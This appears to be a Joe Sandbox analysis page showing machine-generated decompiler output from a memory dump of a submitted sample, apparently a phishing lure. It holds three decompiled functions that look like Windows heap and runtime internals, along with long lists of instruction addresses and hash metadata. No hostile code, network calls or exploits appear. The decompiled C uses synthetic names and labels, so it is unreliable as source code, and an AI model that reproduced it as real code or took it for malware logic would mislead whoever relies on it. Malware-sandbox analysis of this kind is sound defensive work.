                                                                                                                                                                                  0x3334b2e3
                                                                                                                                                                                  0x3334b364
                                                                                                                                                                                  0x3334b365
                                                                                                                                                                                  0x3334b367
                                                                                                                                                                                  0x3334b368
                                                                                                                                                                                  0x3334b369
                                                                                                                                                                                  0x3334b36a
                                                                                                                                                                                  0x3334b36b
                                                                                                                                                                                  0x3334b36c
                                                                                                                                                                                  0x3334b36d
                                                                                                                                                                                  0x3334b36e
                                                                                                                                                                                  0x3334b36f
                                                                                                                                                                                  0x3334b379
                                                                                                                                                                                  0x3334b37a
                                                                                                                                                                                  0x3334b37b
                                                                                                                                                                                  0x3334b37c
                                                                                                                                                                                  0x3334b3f6
                                                                                                                                                                                  0x3334b3f6
                                                                                                                                                                                  0x3334b37e
                                                                                                                                                                                  0x3334b37e
                                                                                                                                                                                  0x3334b383
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b385
                                                                                                                                                                                  0x3334b385
                                                                                                                                                                                  0x3334b38a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b38c
                                                                                                                                                                                  0x3334b38c
                                                                                                                                                                                  0x3334b3a4
                                                                                                                                                                                  0x3334b3a8
                                                                                                                                                                                  0x3334b3ea
                                                                                                                                                                                  0x3334b3aa
                                                                                                                                                                                  0x3334b3ad
                                                                                                                                                                                  0x3334b3b6
                                                                                                                                                                                  0x3334b3b9
                                                                                                                                                                                  0x3334b3be
                                                                                                                                                                                  0x3334b3ca
                                                                                                                                                                                  0x3334b3f1
                                                                                                                                                                                  0x3334b3f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b3cc
                                                                                                                                                                                  0x3334b3cc
                                                                                                                                                                                  0x3334b3ce
                                                                                                                                                                                  0x3334b3d1
                                                                                                                                                                                  0x3334b3d3
                                                                                                                                                                                  0x3334b3d4
                                                                                                                                                                                  0x3334b3da
                                                                                                                                                                                  0x3334b3df
                                                                                                                                                                                  0x3334b3e1
                                                                                                                                                                                  0x3334b3e1
                                                                                                                                                                                  0x3334b3ca
                                                                                                                                                                                  0x3334b3a8
                                                                                                                                                                                  0x3334b38a
                                                                                                                                                                                  0x3334b383
                                                                                                                                                                                  0x3334b3e7
                                                                                                                                                                                  0x3334b2e9
                                                                                                                                                                                  0x3334b2e9
                                                                                                                                                                                  0x3334b2eb
                                                                                                                                                                                  0x3334b2f0
                                                                                                                                                                                  0x3334b2fb
                                                                                                                                                                                  0x3334b301
                                                                                                                                                                                  0x3334b301
                                                                                                                                                                                  0x3334b305
                                                                                                                                                                                  0x3334b307
                                                                                                                                                                                  0x3334b30d
                                                                                                                                                                                  0x3334b314
                                                                                                                                                                                  0x3334b324
                                                                                                                                                                                  0x3334b329
                                                                                                                                                                                  0x3334b32e
                                                                                                                                                                                  0x3334b32f
                                                                                                                                                                                  0x3334b333
                                                                                                                                                                                  0x3334b35a
                                                                                                                                                                                  0x3334b335
                                                                                                                                                                                  0x3334b33b
                                                                                                                                                                                  0x3334b33b
                                                                                                                                                                                  0x3334b33e
                                                                                                                                                                                  0x3334b345
                                                                                                                                                                                  0x3334b34d
                                                                                                                                                                                  0x3334b34d
                                                                                                                                                                                  0x3334b354
                                                                                                                                                                                  0x3334b355
                                                                                                                                                                                  0x3334b359
                                                                                                                                                                                  0x3334b359
                                                                                                                                                                                  0x3334b2e3
                                                                                                                                                                                  0x3334b2ce
                                                                                                                                                                                  0x3334b2c8
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a5d5afb197fb33bb35c7e6608427941208b82778974197edd3bf217e0993bde2
                                                                                                                                                                                  • Instruction ID: 2af98f82a42fcb2b8438e00ae3ffca0f2d7ed7d026c633b78f09b622d597e8f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5d5afb197fb33bb35c7e6608427941208b82778974197edd3bf217e0993bde2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28412771A807009FE7269F1ACC81B1A77E9EF45B50F19C43AE585DB650EB70DC51CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33363660 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			E33363660(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void* __ebx;
				unsigned int _t54;
				signed int _t87;
				intOrPtr* _t89;
				char* _t90;
				intOrPtr _t102;
				signed int _t103;
				void* _t105;
				unsigned int _t112;
				unsigned int _t118;
				unsigned int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				unsigned int _t127;

				_v12 = __ecx;
				_v5 = __edx;
				_t54 = ((__edx & 0x000000ff) << 5) + __ecx;
				_v16 = _t54;
				_t123 = _t54 - 0xa8;
				 *(_t123 + 0x14) =  *(_t123 + 0x14) + 1;
				_t101 = 0x33444f60 + (_t123 >> 0x00000002 & 0x0000001f) * 4;
				L33362330(_t123 >> 0x00000002 & 0x0000001f, 0x33444f60 + (_t123 >> 0x00000002 & 0x0000001f) * 4);
				_t124 =  *_t123;
				if(_t124 != 0) {
					 *_t123 =  *_t124;
					 *((intOrPtr*)(_t123 + 4)) =  *((intOrPtr*)(_t123 + 4)) + 0xffff;
				}
				E333624D0(_t101);
				_t102 = _v5;
				if(_t124 == 0) {
					if(_t102 <= 7) {
						L16:
						_t125 = E333601F1( *((intOrPtr*)(_v12 + 0xc)), _t102, _a4, _a8);
						if(_t125 != 0) {
							asm("lock inc dword [eax]");
						}
						L11:
						_t118 =  *(_t123 + 0x14) & 0x0000ffff;
						if(_t118 > 0x40) {
							_t103 =  *(_t123 + 0x18) & 0x0000ffff;
							if(_t118 >= (( *(_t123 + 0x16) & 0x0000ffff) >> 1) + ( *(_t123 + 0x16) & 0x0000ffff) || _t103 >= _t118 - (_t118 >> 1)) {
								L22:
								 *(_t123 + 0x14) = 0;
								 *(_t123 + 0x16) = 0;
								 *(_t123 + 0x18) = 0;
								goto L12;
							} else {
								if( *((intOrPtr*)(_t123 + 0xc)) >= 2) {
									if( *((intOrPtr*)(_t123 + 0x10)) <= 2) {
										goto L22;
									}
									L25:
									asm("lock cmpxchg [edx], ecx");
									goto L22;
								}
								goto L25;
							}
						}
						L12:
						return _t125;
					}
					_t127 = _v16 + 0xffffff38;
					_v16 = _t127;
					_v20 = 0x33444f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4;
					L33362330(0x33444f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4, 0x33444f60 + (_t127 >> 0x00000002 & 0x0000001f) * 4);
					_t125 =  *_t127;
					if(_t125 != 0) {
						_t112 = _v16;
						 *_t112 =  *_t125;
						 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t112 + 4)) + 0xffff;
					}
					E333624D0(_v20);
					if(_t125 != 0) {
						_t102 = _t102 - 1;
						L4:
						if(_t125 == 0) {
							goto L16;
						}
						_t87 = 1 <<  *(_t125 + 8);
						if(1 > 0x78000) {
							_t87 = 0x78000;
						}
						_t105 = ( *(_t125 + 0xa) & 0x0000ffff) + _t87;
						_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t89 != 0) {
							if( *_t89 == 0) {
								goto L8;
							}
							_t90 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							goto L9;
						} else {
							L8:
							_t90 = 0x7ffe0380;
							L9:
							if( *_t90 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
									E3340F4FD(_t105,  *((intOrPtr*)(_v12 + 0xc)), _t125, _t105, _a4);
								}
							}
							asm("lock xadd [eax], ebx");
							goto L11;
						}
					} else {
						goto L16;
					}
				}
				 *(_t123 + 0x18) =  *(_t123 + 0x18) + 1;
				goto L4;
			}





















                                                                                                                                                                                  0x3336366a
                                                                                                                                                                                  0x3336366d
                                                                                                                                                                                  0x33363676
                                                                                                                                                                                  0x3336367a
                                                                                                                                                                                  0x3336367e
                                                                                                                                                                                  0x3336368a
                                                                                                                                                                                  0x33363696
                                                                                                                                                                                  0x3336369e
                                                                                                                                                                                  0x333636a3
                                                                                                                                                                                  0x333636a7
                                                                                                                                                                                  0x333636ab
                                                                                                                                                                                  0x333636b2
                                                                                                                                                                                  0x333636b2
                                                                                                                                                                                  0x333636b7
                                                                                                                                                                                  0x333636bc
                                                                                                                                                                                  0x333636c1
                                                                                                                                                                                  0x3336373a
                                                                                                                                                                                  0x33363772
                                                                                                                                                                                  0x33363785
                                                                                                                                                                                  0x33363789
                                                                                                                                                                                  0x33363797
                                                                                                                                                                                  0x33363797
                                                                                                                                                                                  0x3336371c
                                                                                                                                                                                  0x33363720
                                                                                                                                                                                  0x33363726
                                                                                                                                                                                  0x333637b9
                                                                                                                                                                                  0x333637c5
                                                                                                                                                                                  0x333637d1
                                                                                                                                                                                  0x333637d3
                                                                                                                                                                                  0x333637d7
                                                                                                                                                                                  0x333637db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333637e4
                                                                                                                                                                                  0x333637ed
                                                                                                                                                                                  0x333b6849
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333637f6
                                                                                                                                                                                  0x333637f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333637f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333637f3
                                                                                                                                                                                  0x333637c5
                                                                                                                                                                                  0x3336372d
                                                                                                                                                                                  0x33363734
                                                                                                                                                                                  0x33363734
                                                                                                                                                                                  0x3336373f
                                                                                                                                                                                  0x33363747
                                                                                                                                                                                  0x33363758
                                                                                                                                                                                  0x3336375b
                                                                                                                                                                                  0x33363760
                                                                                                                                                                                  0x33363764
                                                                                                                                                                                  0x3336379c
                                                                                                                                                                                  0x333637a1
                                                                                                                                                                                  0x333637a8
                                                                                                                                                                                  0x333637a8
                                                                                                                                                                                  0x33363769
                                                                                                                                                                                  0x33363770
                                                                                                                                                                                  0x333637ae
                                                                                                                                                                                  0x333636cd
                                                                                                                                                                                  0x333636cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333636dd
                                                                                                                                                                                  0x333636e4
                                                                                                                                                                                  0x333636e6
                                                                                                                                                                                  0x333636e6
                                                                                                                                                                                  0x333636ef
                                                                                                                                                                                  0x333636f7
                                                                                                                                                                                  0x333636fc
                                                                                                                                                                                  0x333b67fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b680d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33363702
                                                                                                                                                                                  0x33363702
                                                                                                                                                                                  0x33363702
                                                                                                                                                                                  0x33363707
                                                                                                                                                                                  0x3336370a
                                                                                                                                                                                  0x333b6824
                                                                                                                                                                                  0x333b6836
                                                                                                                                                                                  0x333b6836
                                                                                                                                                                                  0x333b6824
                                                                                                                                                                                  0x33363718
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33363718
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33363770
                                                                                                                                                                                  0x333636c9
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8bb7435d69cf76957185698765547a39650466dd5813c2163dfeab88f8695ce8
                                                                                                                                                                                  • Instruction ID: 04346305bec3ed6494ab9cbeeb62567f50a4c0719882b5576a8faca640e16f12
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bb7435d69cf76957185698765547a39650466dd5813c2163dfeab88f8695ce8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51EDB9E507559FD301CF68C8C0AA9B7B4FF04328B098264E884DB764E734E992CB81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338E363 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E3338E363(intOrPtr __ecx, void* __edx) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t50;
				intOrPtr* _t53;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr _t78;
				intOrPtr* _t95;
				intOrPtr* _t96;
				void* _t97;
				void* _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				intOrPtr _t112;
				void* _t113;

				_v24 = _v24 | 0xffffffff;
				_t112 = __ecx;
				_v28 = 0xffd23940;
				_v12 = __ecx;
				while(1) {
					_t50 =  *0x334441d4; // 0x0
					if( *((intOrPtr*)(_t50 + 4 +  *(_t112 + 0x14) * 8)) <= 1) {
						break;
					}
					_push( &_v28);
					_push(0);
					E33392CF0();
				}
				if(( *(_t112 + 0xd4) & 0x04000000) != 0) {
					E33423336(_t112);
				}
				_t53 = _t112 + 0x130;
				if( *_t53 != 0) {
					_push(0x8000);
					_v8 = 0;
					_push( &_v8);
					_push(_t53);
					_push(0xffffffff);
					E33392B90();
				}
				_push( *((intOrPtr*)(_t112 + 0x64)));
				E33392A80();
				_push( *((intOrPtr*)(_t112 + 0x60)));
				E33392A80();
				E3334FBD0(0, _t109, _t112, _t112 + 0x48);
				if( *((intOrPtr*)(_t112 + 0x70)) != 0) {
					E33363B90(_t112 + 0x6c);
				}
				if( *((intOrPtr*)(_t112 + 0x78)) != 0) {
					E33363B90(_t112 + 0x74);
				}
				if( *((intOrPtr*)(_t112 + 0x80)) != 0) {
					E33363B90(_t112 + 0x7c);
				}
				_t95 = _t112 + 0x14c;
				_t110 =  *_t95;
				while(_t110 != _t95) {
					_t110 =  *_t110;
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t110);
				}
				_t62 = _t112 + 0x154;
				_t111 =  *_t62;
				if(_t111 != _t62) {
					do {
						_t63 = _t111 + 0xc;
						_v16 = _t111;
						_t96 =  *_t63;
						if(_t96 != _t63) {
							_t113 = _t111 + 0xc;
							do {
								_t96 =  *_t96;
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t96);
							} while (_t96 != _t113);
							_t112 = _v12;
						}
						_t97 = 0;
						_t111 =  *_t111;
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
					} while (_t111 != _t112 + 0x154);
				} else {
					_t97 = 0;
				}
				_t67 =  *((intOrPtr*)(_t112 + 0x164));
				if( *((intOrPtr*)(_t112 + 0x164)) != 0) {
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t67);
				}
				_t70 =  *((intOrPtr*)(_t112 + 0x168));
				if( *((intOrPtr*)(_t112 + 0x168)) != 0) {
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t70);
				}
				_t73 =  *((intOrPtr*)(_t112 + 0x170));
				if( *((intOrPtr*)(_t112 + 0x170)) != 0) {
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t73);
				}
				_t76 =  *((intOrPtr*)(_t112 + 0x178));
				if( *((intOrPtr*)(_t112 + 0x178)) != 0) {
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t76);
				}
				E3338E4BC(_t112);
				_t78 =  *0x334441d4; // 0x0
				 *((intOrPtr*)(_t78 +  *(_t112 + 0x14) * 8)) = 1;
				asm("lock dec dword [eax+ecx*8+0x4]");
				return E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t97, _t112);
			}
























                                                                                                                                                                                  0x3338e36b
                                                                                                                                                                                  0x3338e371
                                                                                                                                                                                  0x3338e373
                                                                                                                                                                                  0x3338e37b
                                                                                                                                                                                  0x3338e380
                                                                                                                                                                                  0x3338e383
                                                                                                                                                                                  0x3338e38f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338e394
                                                                                                                                                                                  0x3338e395
                                                                                                                                                                                  0x3338e396
                                                                                                                                                                                  0x3338e396
                                                                                                                                                                                  0x3338e3a7
                                                                                                                                                                                  0x333c8faa
                                                                                                                                                                                  0x333c8faa
                                                                                                                                                                                  0x3338e3ad
                                                                                                                                                                                  0x3338e3b5
                                                                                                                                                                                  0x3338e3b7
                                                                                                                                                                                  0x3338e3bf
                                                                                                                                                                                  0x3338e3c2
                                                                                                                                                                                  0x3338e3c3
                                                                                                                                                                                  0x3338e3c4
                                                                                                                                                                                  0x3338e3c6
                                                                                                                                                                                  0x3338e3c6
                                                                                                                                                                                  0x3338e3cb
                                                                                                                                                                                  0x3338e3ce
                                                                                                                                                                                  0x3338e3d3
                                                                                                                                                                                  0x3338e3d6
                                                                                                                                                                                  0x3338e3df
                                                                                                                                                                                  0x3338e3e7
                                                                                                                                                                                  0x3338e3ed
                                                                                                                                                                                  0x3338e3ed
                                                                                                                                                                                  0x3338e3f5
                                                                                                                                                                                  0x3338e3fb
                                                                                                                                                                                  0x3338e3fb
                                                                                                                                                                                  0x3338e406
                                                                                                                                                                                  0x333c8fb8
                                                                                                                                                                                  0x333c8fb8
                                                                                                                                                                                  0x3338e40c
                                                                                                                                                                                  0x3338e412
                                                                                                                                                                                  0x3338e429
                                                                                                                                                                                  0x3338e41d
                                                                                                                                                                                  0x3338e424
                                                                                                                                                                                  0x3338e424
                                                                                                                                                                                  0x3338e42d
                                                                                                                                                                                  0x3338e433
                                                                                                                                                                                  0x3338e437
                                                                                                                                                                                  0x333c8fc2
                                                                                                                                                                                  0x333c8fc2
                                                                                                                                                                                  0x333c8fc5
                                                                                                                                                                                  0x333c8fc8
                                                                                                                                                                                  0x333c8fcc
                                                                                                                                                                                  0x333c8fce
                                                                                                                                                                                  0x333c8fd1
                                                                                                                                                                                  0x333c8fd8
                                                                                                                                                                                  0x333c8fdf
                                                                                                                                                                                  0x333c8fe4
                                                                                                                                                                                  0x333c8fe8
                                                                                                                                                                                  0x333c8fe8
                                                                                                                                                                                  0x333c8ff4
                                                                                                                                                                                  0x333c8ff6
                                                                                                                                                                                  0x333c8ffc
                                                                                                                                                                                  0x333c9007
                                                                                                                                                                                  0x3338e43d
                                                                                                                                                                                  0x3338e43d
                                                                                                                                                                                  0x3338e43d
                                                                                                                                                                                  0x3338e43f
                                                                                                                                                                                  0x3338e447
                                                                                                                                                                                  0x333c901b
                                                                                                                                                                                  0x333c901b
                                                                                                                                                                                  0x3338e44d
                                                                                                                                                                                  0x3338e455
                                                                                                                                                                                  0x333c9030
                                                                                                                                                                                  0x333c9030
                                                                                                                                                                                  0x3338e45b
                                                                                                                                                                                  0x3338e463
                                                                                                                                                                                  0x333c9045
                                                                                                                                                                                  0x333c9045
                                                                                                                                                                                  0x3338e469
                                                                                                                                                                                  0x3338e471
                                                                                                                                                                                  0x3338e47e
                                                                                                                                                                                  0x3338e47e
                                                                                                                                                                                  0x3338e485
                                                                                                                                                                                  0x3338e48d
                                                                                                                                                                                  0x3338e498
                                                                                                                                                                                  0x3338e4a2
                                                                                                                                                                                  0x3338e4bb

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 344ae2b4c78147139081ba51b5c1775a6951b7e45e80e2ca25fb91e2b3862380
                                                                                                                                                                                  • Instruction ID: ca4cf0bc995adba6897544e5f41281bc749ac2c97c3ec6591f7dfce8843fed38
                                                                                                                                                                                  • Opcode Fuzzy Hash: 344ae2b4c78147139081ba51b5c1775a6951b7e45e80e2ca25fb91e2b3862380
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA517571A41B04EFE721DF64C8C0E9AB3EDFB04794F44842AE6559B6A0CB30EE45CB52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335510D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E3335510D(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int* _t73;
				signed int* _t76;
				signed int _t80;
				signed int _t81;
				void* _t82;

				_t71 = __edx;
				_t66 = __ecx;
				_push(0x1c);
				_push(0x3342bd00);
				E333A7BE4(__ebx, __edi, __esi);
				_t64 = __edx;
				 *((intOrPtr*)(_t82 - 0x28)) = __edx;
				_t73 = __ecx;
				 *((intOrPtr*)(_t82 - 0x2c)) = __ecx;
				_t76 =  *(_t82 + 8);
				if(_t76 == 0 || __ecx == 0 || __edx == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E33424A6D(_t64, _t66, _t71, _t73, _t76);
					_t38 = 0xc000000d;
				} else {
					if( *__ecx == 0) {
						L10:
						 *(_t82 - 0x20) =  *(_t82 - 0x20) & 0x00000000;
						_t38 = E33351E70(_t82 - 0x20, 0);
						 *(_t82 - 0x24) = _t38;
						__eflags = _t38;
						if(_t38 < 0) {
							L9:
							 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
							return _t38;
						}
						L33362330(_t38, _t64);
						 *(_t82 - 4) = 1;
						__eflags =  *_t73;
						if( *_t73 != 0) {
							asm("lock inc dword [eax]");
							L27:
							 *(_t82 - 4) = 0xfffffffe;
							E333552CD(_t64);
							_t78 =  *(_t82 - 0x20);
							__eflags =  *(_t82 - 0x20);
							if(__eflags != 0) {
								E3334AE40(_t64, _t73, _t78, __eflags, _t78);
							}
							__eflags =  *(_t82 - 0x24);
							if( *(_t82 - 0x24) >= 0) {
								 *( *(_t82 + 8)) =  *_t73;
							}
							_t38 =  *(_t82 - 0x24);
							goto L9;
						}
						__eflags = _t73 - 0x33446890;
						if(_t73 != 0x33446890) {
							__eflags = _t73 - 0x33446888;
							if(_t73 != 0x33446888) {
								L26:
								 *_t73 =  *(_t82 - 0x20);
								_t23 = _t82 - 0x20;
								 *_t23 =  *(_t82 - 0x20) & 0x00000000;
								__eflags =  *_t23;
								goto L27;
							}
							E33351D50(_t66,  *(_t82 - 0x20), "true");
							_t49 = E3338D0F0( *(_t82 - 0x20), "true");
							L37:
							__eflags = _t49;
							 *(_t82 - 0x24) = _t49;
							if(_t49 >= 0) {
								goto L26;
							}
							goto L27;
						}
						_t50 =  *0x33446970; // 0x0
						__eflags = _t50;
						if(_t50 != 0) {
							E33351D50(_t66,  *(_t82 - 0x20), _t50);
							L25:
							_t52 =  *0x33446968; // 0x0
							__eflags = _t52;
							if(_t52 != 0) {
								_t49 = E3338D6A0( *(_t82 - 0x20), _t52);
								goto L37;
							}
							goto L26;
						}
						_t53 =  *0x3344696c; // 0x0
						__eflags = _t53;
						if(_t53 != 0) {
							L19:
							E33351D50(_t66,  *(_t82 - 0x20), _t53);
							__eflags =  *0x3344696c;
							if( *0x3344696c > 0) {
								_t55 = 0;
								L24:
								E3338BED0( *(_t82 - 0x20), _t55);
								goto L25;
							}
							_t80 =  *(_t82 - 0x20);
							__eflags = _t80;
							if(_t80 != 0) {
								_t57 =  *(_t80 + 0x110);
								__eflags = _t57;
								if(_t57 != 0) {
									L22:
									_t55 = _t57 << 2;
									__eflags = _t55 - 0x180;
									if(_t55 < 0x180) {
										_t55 = 0x180;
									}
									goto L24;
								}
							}
							_t57 =  *0x7ffe03c0;
							goto L22;
						}
						_t81 =  *(_t82 - 0x20);
						__eflags = _t81;
						if(_t81 != 0) {
							_t58 =  *(_t81 + 0x110);
							__eflags = _t58;
							if(_t58 != 0) {
								L17:
								_t53 = _t58 << 3;
								_t66 = 0x300;
								__eflags = _t53 - 0x300;
								if(_t53 < 0x300) {
									_t53 = 0x300;
								}
								goto L19;
							}
						}
						_t58 =  *0x7ffe03c0;
						goto L17;
					}
					 *((char*)(_t82 - 0x19)) = 0;
					L333553C0(__edx);
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					if( *_t73 != 0) {
						asm("lock inc dword [eax]");
						 *_t76 =  *_t73;
						 *((char*)(_t82 - 0x19)) = 1;
					}
					 *(_t82 - 4) = 0xfffffffe;
					E333552C6(_t64);
					if( *((char*)(_t82 - 0x19)) == 0) {
						goto L10;
					}
					_t38 = 0;
				}
			}

















                                                                                                                                                                                  0x3335510d
                                                                                                                                                                                  0x3335510d
                                                                                                                                                                                  0x3335510d
                                                                                                                                                                                  0x3335510f
                                                                                                                                                                                  0x33355114
                                                                                                                                                                                  0x33355119
                                                                                                                                                                                  0x3335511b
                                                                                                                                                                                  0x3335511e
                                                                                                                                                                                  0x33355120
                                                                                                                                                                                  0x33355123
                                                                                                                                                                                  0x33355128
                                                                                                                                                                                  0x333b0599
                                                                                                                                                                                  0x333b059e
                                                                                                                                                                                  0x33355151
                                                                                                                                                                                  0x33355154
                                                                                                                                                                                  0x3335519b
                                                                                                                                                                                  0x3335519b
                                                                                                                                                                                  0x333551a5
                                                                                                                                                                                  0x333551aa
                                                                                                                                                                                  0x333551ad
                                                                                                                                                                                  0x333551af
                                                                                                                                                                                  0x33355189
                                                                                                                                                                                  0x3335518c
                                                                                                                                                                                  0x33355198
                                                                                                                                                                                  0x33355198
                                                                                                                                                                                  0x333551b2
                                                                                                                                                                                  0x333551b7
                                                                                                                                                                                  0x333551c0
                                                                                                                                                                                  0x333551c2
                                                                                                                                                                                  0x333552d4
                                                                                                                                                                                  0x33355257
                                                                                                                                                                                  0x33355257
                                                                                                                                                                                  0x3335525e
                                                                                                                                                                                  0x33355263
                                                                                                                                                                                  0x33355266
                                                                                                                                                                                  0x33355268
                                                                                                                                                                                  0x333b058f
                                                                                                                                                                                  0x333b058f
                                                                                                                                                                                  0x3335526e
                                                                                                                                                                                  0x33355272
                                                                                                                                                                                  0x33355279
                                                                                                                                                                                  0x33355279
                                                                                                                                                                                  0x3335527b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335527b
                                                                                                                                                                                  0x333551c8
                                                                                                                                                                                  0x333551ce
                                                                                                                                                                                  0x333552a2
                                                                                                                                                                                  0x333552a8
                                                                                                                                                                                  0x3335524e
                                                                                                                                                                                  0x33355251
                                                                                                                                                                                  0x33355253
                                                                                                                                                                                  0x33355253
                                                                                                                                                                                  0x33355253
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355253
                                                                                                                                                                                  0x333552b0
                                                                                                                                                                                  0x333552b8
                                                                                                                                                                                  0x333552bd
                                                                                                                                                                                  0x333552bd
                                                                                                                                                                                  0x333552bf
                                                                                                                                                                                  0x333552c2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333552c4
                                                                                                                                                                                  0x333551d4
                                                                                                                                                                                  0x333551d9
                                                                                                                                                                                  0x333551db
                                                                                                                                                                                  0x333b0564
                                                                                                                                                                                  0x33355241
                                                                                                                                                                                  0x33355241
                                                                                                                                                                                  0x33355246
                                                                                                                                                                                  0x33355248
                                                                                                                                                                                  0x333b0579
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0579
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355248
                                                                                                                                                                                  0x333551e1
                                                                                                                                                                                  0x333551e6
